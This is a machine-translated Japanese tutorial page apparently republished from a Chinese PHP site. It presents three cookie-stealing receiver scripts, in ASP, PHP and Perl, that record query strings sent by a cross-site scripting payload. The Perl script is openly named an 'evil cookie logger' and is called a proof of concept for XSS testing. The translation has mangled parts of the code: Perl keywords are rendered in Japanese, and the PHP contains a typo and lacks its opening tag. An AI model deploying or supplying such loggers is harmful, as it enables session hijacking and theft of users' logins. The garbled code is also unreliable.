ホームページ > バックエンド開発 > PHPチュートリアル > Cookie コードの盗用 (asp、php、perl)_PHP チュートリアル

Cookie コードの盗用 (asp、php、perl)_PHP チュートリアル

WBOY
リリース: 2016-07-13 17:33:56
オリジナル
990 人が閲覧しました

ASP版

<%
dim strfilename
strfilename = "mydata.txt" データ文件存放出目录
set lP=server.createObject("Adod​​b.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312 "
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>

PHP 版
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a ");
fwirte($fp,$info." ");
fclose($fp);
}
?>

PERL バージョン
#!/usr/bin/perl
# evil_cookie_logger.cgi
# BrainRawt によってコード化されたリモート Cookie ロギング CGI
#
# 注:
# クロスサイト スクリプティングの脆弱性をテストする際の概念実証スクリプトとしてコード化されています。

$borrowed_info = $ENV{QUERY_STRING};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1)) /例;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") または print "Content-type:
text/html 何か問題が発生しました ";
print EVIL_COOKIE_LOG "$borrowed_info ";
print "コンテンツタイプ: text/html ";
閉じる(EVIL_COOKIE_LOG);

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/508523.html技術記事 ASP版 % dim strfilename strfilename = "mydata.txt" データベース文件存放出目录 set lP=server.createObject("Adod​​b.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request.S ...
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート